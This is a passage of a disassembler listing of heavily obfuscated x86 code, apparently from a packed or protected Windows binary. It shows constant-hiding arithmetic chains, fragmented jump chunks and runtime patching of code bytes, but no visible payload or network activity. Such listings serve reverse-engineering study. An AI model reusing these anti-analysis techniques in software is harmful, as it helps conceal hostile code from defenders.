; END OF FUNCTION CHUNK	FOR sub_45202B
; ---------------------------------------------------------------------------
		shl	ecx, 19h
		pop	edi
		adc	ecx, 83DC77DFh
		cmp	ecx, edx
		jmp	loc_44C2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_4470DB:				; CODE XREF: sub_44BCAE:loc_4571FDj
		sub	eax, 3DA005C9h
		xor	eax, 49B27791h
		sub	eax, 0F58F1F53h
		call	sub_43B788

locret_4470F2:				; CODE XREF: hvvrg7ie:0044C422j
		retn
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447146

loc_4470F3:				; CODE XREF: sub_447146+17j
		jmp	loc_43B4B7
; END OF FUNCTION CHUNK	FOR sub_447146
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_4470F8:				; CODE XREF: sub_4500FA:loc_44336Aj
					; sub_4500FA+51A0j
		push	69491B1h
		pop	ecx
		xor	ecx, 0EC7DFC4Ch
		and	ecx, 67D417Eh
		sub	ecx, 9776B57Fh
		or	ecx, 0A97BE919h
		xor	ecx, 1F605582h
		call	sub_43BFB4
; END OF FUNCTION CHUNK	FOR sub_4500FA
; START	OF FUNCTION CHUNK FOR sub_444F80

loc_447121:				; CODE XREF: sub_444F80+Fj
		jmp	loc_446BC4
; END OF FUNCTION CHUNK	FOR sub_444F80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444315

loc_447126:				; CODE XREF: sub_444315+15j
		jmp	loc_44497F
; END OF FUNCTION CHUNK	FOR sub_444315

; =============== S U B	R O U T	I N E =======================================



sub_44712B	proc near		; CODE XREF: sub_410957+14Cp
					; sub_44712B+5j
					; DATA XREF: ...
		call	sub_44713B
		jmp	ds:off_41D0A4
sub_44712B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444CF3

loc_447136:				; CODE XREF: sub_444CF3:loc_43F06Cj
		jmp	sub_44801A
; END OF FUNCTION CHUNK	FOR sub_444CF3

; =============== S U B	R O U T	I N E =======================================



sub_44713B	proc near		; CODE XREF: sub_44712Bp sub_451669-5j ...
		pop	edx
		call	sub_459E78

loc_447141:				; CODE XREF: hvvrg7ie:0045B51Aj
		jmp	nullsub_59
sub_44713B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_447146	proc near		; CODE XREF: sub_43E60A:loc_45836Fj

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043B4B7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004470F3 SIZE 00000005 BYTES

		push	ebp

loc_447147:				; CODE XREF: sub_454789:loc_45AAA8j
		call	sub_45AF0A
		push	ecx
		mov	ecx, [esp+4+arg_8]
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_43B4CB
		jmp	loc_4470F3
sub_447146	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_447162	proc near		; CODE XREF: hvvrg7ie:loc_442C1Bj
					; hvvrg7ie:00449B07p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00451245 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004514CA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456A70 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045A5FD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B192 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		push	edx
		push	8AD32126h
		pop	edx
		jmp	loc_456A70
sub_447162	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440CB

loc_447172:				; CODE XREF: hvvrg7ie:0043B0A1j
					; hvvrg7ie:loc_44152Bj	...
		jmp	loc_44562B
; END OF FUNCTION CHUNK	FOR sub_4440CB
; ---------------------------------------------------------------------------

loc_447177:				; CODE XREF: hvvrg7ie:00446E14j
					; hvvrg7ie:00458987j
		xchg	edx, [esp]
		mov	ecx, edx
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_44717C:				; CODE XREF: sub_44D4EF:loc_43FEF1j
		pop	edx
		jmp	loc_43FAEB
; END OF FUNCTION CHUNK	FOR sub_44D4EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_447182:				; CODE XREF: sub_450246+6277j
		mov	[ebp-1Ch], eax
		jmp	loc_439353
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA70

loc_44718A:				; CODE XREF: sub_43CA70+FBBj
					; sub_44E3B3:loc_443EBCj
		push	0FD391A07h
		pop	eax
		rol	eax, 8
		xor	eax, 0EAD946D2h
		add	eax, ebp
		jmp	loc_456E09
; END OF FUNCTION CHUNK	FOR sub_43CA70
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_4471A0:				; CODE XREF: sub_44059F-560Ej
		or	ecx, ebp
; END OF FUNCTION CHUNK	FOR sub_44059F
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_4471A2:				; CODE XREF: sub_44A6D7:loc_441859j
					; sub_44059F:loc_4465D0j
		mov	eax, [esp+0]
		push	eax
		call	sub_44612F
		or	eax, eax
		jnz	loc_44AA03
		jmp	loc_448F58
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456763

loc_4471B8:				; CODE XREF: sub_456763-15578j
		sub	ebx, ebp

loc_4471BA:				; CODE XREF: sub_456763:loc_444465j
		call	sub_449CC8
; END OF FUNCTION CHUNK	FOR sub_456763
; START	OF FUNCTION CHUNK FOR sub_454099

loc_4471BF:				; CODE XREF: sub_454099-13E06j
		jmp	loc_440F43
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_4471C4:				; CODE XREF: hvvrg7ie:0044DAC5j
		jle	loc_44F5B5

; =============== S U B	R O U T	I N E =======================================



sub_4471CA	proc near		; CODE XREF: sub_43B7B9:loc_45B122p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043BE90 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B4E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458DDC SIZE 00000019 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	ebp, [esp-4+arg_0]
		mov	edx, ebp
		pop	ebp
		mov	eax, [esp-8+arg_4]
		push	edi
		jmp	loc_458DDC
sub_4471CA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_4471DD:				; CODE XREF: hvvrg7ie:loc_44AFFEj
					; sub_44B1C6+42C7j
		jmp	loc_456ACF
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------
		jmp	loc_44F499

; =============== S U B	R O U T	I N E =======================================



sub_4471E7	proc near		; CODE XREF: sub_456335+8j

; FUNCTION CHUNK AT 00449FBE SIZE 00000005 BYTES

		add	esp, 0FFFFFFF0h
		push	offset loc_45834D
		jmp	loc_449FBE
sub_4471E7	endp


; =============== S U B	R O U T	I N E =======================================



sub_4471F4	proc near		; DATA XREF: sub_446925-64FBo
		push	6A7E2F7Dh
		pop	ecx
		xor	ecx, 87B3C8B3h
		add	ecx, 1276E4FEh
		xchg	ecx, [esp+0]
		jmp	sub_450C5A
sub_4471F4	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_465. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44720F:				; CODE XREF: hvvrg7ie:loc_44E76Bj
		jmp	locret_440D48
; ---------------------------------------------------------------------------

loc_447214:				; CODE XREF: hvvrg7ie:00450D1Cj
		push	esi
		push	0A47FA3F7h
		pop	esi
		xor	esi, 3860C04Eh
		js	loc_43F374

loc_447227:				; CODE XREF: hvvrg7ie:00439A61j
		jmp	loc_450063

; =============== S U B	R O U T	I N E =======================================



sub_44722C	proc near		; CODE XREF: sub_45889B:loc_43FE79p
					; hvvrg7ie:0044BDC5j
		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [ebp-18h]
		mov	eax, [eax]
		shl	eax, 3
		push	offset sub_4399AE
		jmp	nullsub_60
sub_44722C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_447242:				; CODE XREF: sub_43E163:loc_447252j
		jnz	loc_4487EE

loc_447248:				; CODE XREF: hvvrg7ie:0045A6FDj
		jmp	loc_458D18
; END OF FUNCTION CHUNK	FOR sub_43E163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_44724D:				; CODE XREF: sub_446D8D+1j
		jmp	loc_43F8D8
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_447252:				; CODE XREF: sub_43E163+6EABj
		jmp	loc_447242
; END OF FUNCTION CHUNK	FOR sub_43E163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B13

loc_447257:				; CODE XREF: sub_440B13:loc_440B19j
		jmp	loc_44BDF7
; END OF FUNCTION CHUNK	FOR sub_440B13
; ---------------------------------------------------------------------------
		cdq
		jbe	loc_440147
		jmp	loc_4487EE
; ---------------------------------------------------------------------------

loc_447268:				; DATA XREF: hvvrg7ie:0044BBD3o
		call	sub_455751
		push	0DBDCF5F8h
		pop	eax
		add	eax, 0DCACCC7Eh
		xor	eax, 0FC2E6A8Fh
		and	eax, 26AD54E5h
		rol	eax, 0Bh

loc_447288:				; CODE XREF: hvvrg7ie:loc_451A5Fj
		cmp	eax, 0B22EEE50h
		jmp	loc_43B0BA
; ---------------------------------------------------------------------------
		jns	loc_459D90
		jmp	loc_43CD60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_44729E:				; CODE XREF: sub_44059F:loc_442A2Fj
		test	eax, 8000000h
		jmp	loc_4525D5
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_4472A9:				; CODE XREF: sub_446EC2-6710j
		jnz	loc_43C899
		jmp	loc_4529FD
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_4472B4:				; CODE XREF: sub_450F97:loc_4553EBj
		jz	loc_455948
		jmp	loc_449C6F
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441C58

loc_4472BF:				; CODE XREF: sub_441C58+Aj
		mov	[ebp-20h], eax
		jmp	loc_4467A3
; END OF FUNCTION CHUNK	FOR sub_441C58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_4472C7:				; CODE XREF: sub_43A0EC:loc_43A0F3j
		test	byte ptr [ebp-8], 2
		jz	loc_4467A3
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_4438FA
		jmp	loc_44679F
; END OF FUNCTION CHUNK	FOR sub_43A0EC
; ---------------------------------------------------------------------------
		push	0FFB3CA7Ch
		sub	edx, ebp
		jmp	loc_44410B
; ---------------------------------------------------------------------------

loc_4472EB:				; CODE XREF: hvvrg7ie:00451C6Aj
		mov	[edi], esi
		xor	ecx, edx
		add	esi, eax

loc_4472F1:				; CODE XREF: hvvrg7ie:00446DFDj
		jmp	loc_4484AC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_69. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4472F7:				; CODE XREF: sub_445CCD+95DBj
		jmp	nullsub_331
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_4472FC:				; CODE XREF: sub_44E4A6-5474j
		jmp	loc_43CCD6
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_447301:				; CODE XREF: sub_44191F-2798j
		jmp	loc_44BD83
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_447306:				; CODE XREF: sub_453422:loc_44372Bj
		mov	ecx, [ecx]
		and	ecx, 7
		mov	al, 1
		shl	al, cl
		mov	edx, [ebp-20h]
		jmp	loc_45B3E3
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_447317:				; CODE XREF: sub_454099:loc_44FE2Fj
		jz	loc_4596DB
		jmp	loc_44BF7E
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_447322:				; CODE XREF: sub_448DE4:loc_45877Fj
		add	edi, 0A9927240h
		popf
		xchg	edi, [esp-8+arg_4]
		jmp	loc_456BE9
; END OF FUNCTION CHUNK	FOR sub_448DE4

; =============== S U B	R O U T	I N E =======================================



sub_447331	proc near		; DATA XREF: sub_45919F+7o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A908 SIZE 00000020 BYTES

		push	85EC290Dh
		xchg	esi, [esp+4+var_4]
		mov	eax, esi
		pop	esi
		jmp	loc_43A908
sub_447331	endp

; ---------------------------------------------------------------------------

loc_447341:				; CODE XREF: hvvrg7ie:004542B5j
		jno	loc_4418E0
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_447347:				; CODE XREF: sub_447E56:loc_453FFBj
		add	eax, 2BC13FA0h
		xchg	eax, [esp+4+var_4]
		jmp	loc_454604
; END OF FUNCTION CHUNK	FOR sub_447E56
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_447. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_447356:				; CODE XREF: hvvrg7ie:00455C7Dj
		jmp	loc_444D75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_44735B:				; CODE XREF: sub_44736C+AF32j
		jmp	sub_458706
; END OF FUNCTION CHUNK	FOR sub_44736C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_368. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F4D4

loc_447361:				; CODE XREF: sub_44F4D4-42D4j
		jmp	sub_444E49
; END OF FUNCTION CHUNK	FOR sub_44F4D4
; ---------------------------------------------------------------------------

loc_447366:				; CODE XREF: hvvrg7ie:0045B57Fj
		xor	edx, 0BE467680h

; =============== S U B	R O U T	I N E =======================================



sub_44736C	proc near		; CODE XREF: sub_4422A8+A6B1p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004397F4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00439ADE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441158 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004420FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443D7D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00444260 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044735B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004491BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044933E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044A3A7 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044D6D9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FF08 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451C15 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045228F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454689 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045485E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458E54 SIZE 0000000B BYTES

		xchg	ebx, [esp+4+var_4]
		pop	ebx
		push	0A4F614E4h
		pop	edx
		sub	edx, 0DCFEEAE9h
		xor	edx, 5B5D4FA7h
		add	edx, ebp
		jmp	loc_439ADE
sub_44736C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_447389:				; CODE XREF: sub_441E23+C132j
		rol	ecx, 1Ah
		call	sub_43C2B2
; END OF FUNCTION CHUNK	FOR sub_441E23
; START	OF FUNCTION CHUNK FOR sub_43EED4

loc_447391:				; CODE XREF: sub_43EED4+E0A4j
		jmp	loc_450CF6
; END OF FUNCTION CHUNK	FOR sub_43EED4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_447396:				; CODE XREF: sub_45038B-9D17j
		xchg	ebx, [edi]
		cmp	edi, ebp
		jmp	loc_4529A2
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------

locret_44739F:				; CODE XREF: hvvrg7ie:loc_444B6Bj
		retn
; ---------------------------------------------------------------------------

loc_4473A0:				; CODE XREF: hvvrg7ie:00449B81j
		jmp	sub_44E560
; ---------------------------------------------------------------------------

loc_4473A5:				; CODE XREF: hvvrg7ie:00447E93j
		jmp	nullsub_442
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4473AA:				; CODE XREF: sub_44D2F8-4A3Cj
		js	nullsub_212

loc_4473B0:				; CODE XREF: sub_44D2F8:loc_43BABBj
		push	4A89DC4Dh
		pop	eax
		and	eax, 0FECDF1EDh
		sub	eax, 5CBA4ED2h
		add	eax, 0F7B95CB3h
		add	eax, ebp
		push	ecx
		jmp	loc_445AE0
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_4473D0:				; CODE XREF: sub_44543A:loc_44A860j
		xor	eax, 0C3B7E6E7h
		sub	eax, 0C50FBC2Dh
		rol	eax, 12h
		xor	eax, 0AB2E9773h
		add	eax, ebp
		add	eax, 64055B14h
		push	eax
		jmp	loc_455216
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_4473F3:				; CODE XREF: sub_4589D3:loc_44034Aj
		jnz	loc_44834D

loc_4473F9:				; CODE XREF: hvvrg7ie:loc_43FC53j
		push	offset loc_44C031
		jmp	nullsub_543
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457774

loc_447403:				; CODE XREF: sub_457774+Fj
		call	sub_446D8D
		mov	eax, 276E7523h
		push	offset loc_440C94
		jmp	nullsub_301
; END OF FUNCTION CHUNK	FOR sub_457774
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44359D

loc_447417:				; CODE XREF: sub_44359D:loc_4546E4j
		mov	eax, [eax]

loc_447419:				; CODE XREF: hvvrg7ie:0044B643j
		push	offset sub_452D2F
		jmp	nullsub_211
; END OF FUNCTION CHUNK	FOR sub_44359D
; ---------------------------------------------------------------------------
		and	edi, edx
		jmp	sub_44440B
; ---------------------------------------------------------------------------
		jle	loc_459040
		jmp	sub_4585A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_447435:				; CODE XREF: sub_4546E9:loc_43C277j
		sub	ecx, 0C9A1809Eh
		or	edx, edi
		jmp	loc_444A65
; END OF FUNCTION CHUNK	FOR sub_4546E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_447442:				; CODE XREF: sub_44BEBB:loc_4476E3j
					; sub_44BEBB+F937j
		call	sub_4598CF

loc_447447:				; CODE XREF: sub_43BFB4+14B3Cj
		jmp	loc_45964A
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E1C9

loc_44744C:				; CODE XREF: sub_44E1C9:loc_44F381j
		jle	loc_442DCD
		jmp	loc_4429F9
; END OF FUNCTION CHUNK	FOR sub_44E1C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_447457:				; CODE XREF: sub_44CDE7+9j
					; sub_43EBB6:loc_45825Bj
		push	edx
		push	eax
		mov	eax, [ebp-18h]
		add	eax, eax
		cdq
		add	eax, [esp+0]
		adc	edx, [esp+4]
		jmp	loc_43AC5C
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------

loc_44746B:				; CODE XREF: hvvrg7ie:00453EA0j
		jnp	locret_4428E7
		mov	[edx], edi
; START	OF FUNCTION CHUNK FOR sub_45423F

loc_447473:				; CODE XREF: sub_45423F-42B0j
		push	offset sub_449E1D
		jmp	nullsub_381
; END OF FUNCTION CHUNK	FOR sub_45423F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44747D:				; CODE XREF: sub_454099:loc_440764j
					; DATA XREF: sub_451669:loc_4420A5o
		push	1F2B4533h
		pop	esi
		xor	esi, 0A5A9B33Ah
		test	esi, 2000000h
		jmp	loc_45A3A1
; END OF FUNCTION CHUNK	FOR sub_454099
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_485. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D52

loc_447495:				; CODE XREF: sub_454D52+Fj
		jmp	loc_44C381
; END OF FUNCTION CHUNK	FOR sub_454D52
; ---------------------------------------------------------------------------

loc_44749A:				; CODE XREF: hvvrg7ie:00443CF9j
		jmp	loc_448641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A95

loc_44749F:				; CODE XREF: sub_459A95:loc_4474D1j
		pop	ecx
		or	ecx, 7338B6C3h
		sub	ecx, 5BF1A6DEh
		xor	ecx, ds:4000F1h
		and	ecx, 6448DCD1h
		add	ecx, 0DC4394EAh
		jmp	loc_43CCDC
; END OF FUNCTION CHUNK	FOR sub_459A95
; ---------------------------------------------------------------------------

loc_4474C3:				; DATA XREF: sub_443AE2:loc_44F577o
		jz	loc_43D383
		mov	eax, [esp]
		call	sub_45B334
; START	OF FUNCTION CHUNK FOR sub_459A95

loc_4474D1:				; CODE XREF: sub_459A95+Dj
		jmp	loc_44749F
; END OF FUNCTION CHUNK	FOR sub_459A95
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_322. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4474D7:				; CODE XREF: sub_44D2F8-11DDj
		jmp	sub_45278C
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_4474DC:				; CODE XREF: sub_44BFF5-11C3j
		jmp	loc_440E35
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_297. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438FA

loc_4474E2:				; CODE XREF: sub_4438FA+8179j
		jmp	nullsub_90
; END OF FUNCTION CHUNK	FOR sub_4438FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_4474E7:				; CODE XREF: sub_454099-9284j
		shr	ebp, 1Eh
		ja	loc_443B7B
		push	ebp

loc_4474F1:				; CODE XREF: sub_454099:loc_454507j
		cmp	dword ptr [ebp-108h], 43776569h
		jnz	loc_4575F8
		jmp	loc_459799
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449785

loc_447506:				; CODE XREF: sub_449785:loc_43AD13j
		push	eax
		push	offset sub_4596EB
		jmp	loc_44AFA9
; END OF FUNCTION CHUNK	FOR sub_449785
; ---------------------------------------------------------------------------

loc_447511:				; CODE XREF: hvvrg7ie:00456E96j
		call	sub_44DE0A
		push	offset loc_450714
		jmp	loc_43E5C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_447520:				; CODE XREF: sub_44BFF5-10238j
					; sub_44BFF5:loc_44AE2Cj
		push	0A99D407Bh
		xchg	ebx, [esp+0]
		mov	eax, ebx
		pop	ebx
		sub	eax, 25DB7ECEh
		rol	eax, 15h
		jmp	loc_4566CD
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429CE

loc_447539:				; CODE XREF: sub_4429CE:loc_439D0Cj
		xor	ecx, 0D897A4A7h
		add	eax, ecx
		pop	ecx
		rol	eax, 6
		jmp	loc_44BE3A
; END OF FUNCTION CHUNK	FOR sub_4429CE
; ---------------------------------------------------------------------------
		sub	edi, ebp
		jmp	sub_44A2CA
; ---------------------------------------------------------------------------
		mov	[ebx], esi
		jmp	sub_442BA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_447558:				; CODE XREF: sub_451669:loc_4502DCj
		add	ecx, 98DEF307h
		mov	[ecx], eax
; END OF FUNCTION CHUNK	FOR sub_451669
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_447560:				; CODE XREF: sub_44D2F8:loc_441AF7j
		pop	ecx
		lea	eax, nullsub_1
		mov	byte ptr [eax],	0C3h
		jmp	loc_448551
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_44756F:				; CODE XREF: sub_44388C+50CFj
		jnp	loc_454587
		xchg	ecx, [eax]
		and	ecx, 179C0274h
		jmp	loc_45A0CC
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------

loc_447582:				; CODE XREF: hvvrg7ie:loc_44ED97j
		add	edx, ebp
		add	edx, 6B77C5A6h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h

loc_447590:				; CODE XREF: hvvrg7ie:loc_459502j
		jz	loc_4520C2
		jmp	loc_459B66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44914D

loc_44759B:				; CODE XREF: sub_44914D+5j
		lea	eax, dword_447B64
		push	offset sub_44DB53
		jmp	loc_442566
; END OF FUNCTION CHUNK	FOR sub_44914D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_4475AB:				; CODE XREF: sub_4544DD:loc_449B22j
					; hvvrg7ie:00449B37j
		add	edx, 30C6F65Ch
		xchg	edx, [esp+14h+var_14]
		jmp	loc_43DEEB
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 15h

loc_4475BD:				; CODE XREF: hvvrg7ie:loc_448926j
		mov	ds:dword_45A8CC, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B6B

loc_4475C4:				; CODE XREF: sub_446B6B:loc_44CE18j
		xchg	esi, [esp+0]
		mov	[ebp-4], eax
		call	sub_450434

loc_4475CF:				; DATA XREF: sub_43A088:loc_44ADE6o
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_10
; END OF FUNCTION CHUNK	FOR sub_446B6B

; =============== S U B	R O U T	I N E =======================================



sub_4475D7	proc near		; CODE XREF: sub_41A645+20p
					; sub_41C28D+293p ...
		call	sub_4475EC
		jmp	ds:off_41D0CC
sub_4475D7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44973C

loc_4475E2:				; CODE XREF: sub_44973C:loc_44973Dj
		jmp	loc_439A8A
; END OF FUNCTION CHUNK	FOR sub_44973C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_4475E7:				; CODE XREF: sub_43E60A+39B8j
		jmp	loc_43A650
; END OF FUNCTION CHUNK	FOR sub_43E60A

; =============== S U B	R O U T	I N E =======================================



sub_4475EC	proc near		; CODE XREF: sub_4475D7p sub_4518EF+3j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CDCC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A276 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004567B5 SIZE 0000000A BYTES

		pop	edx
		jb	loc_4567B5

loc_4475F3:				; CODE XREF: hvvrg7ie:00449A5Fj
		mov	eax, [esp-4+arg_0]
		jmp	loc_44A276
sub_4475EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_4475FB:				; CODE XREF: sub_455087:loc_45877Aj
		jz	loc_453260
		jmp	loc_442A39
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA98

loc_447606:				; CODE XREF: sub_43FA98:loc_442203j
		call	sub_44F776

loc_44760B:				; CODE XREF: sub_43D0B7+199ADj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43FA98

; =============== S U B	R O U T	I N E =======================================



sub_447610	proc near		; DATA XREF: hvvrg7ie:00441547o

; FUNCTION CHUNK AT 0043A6D6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043D523 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004589BE SIZE 00000005 BYTES
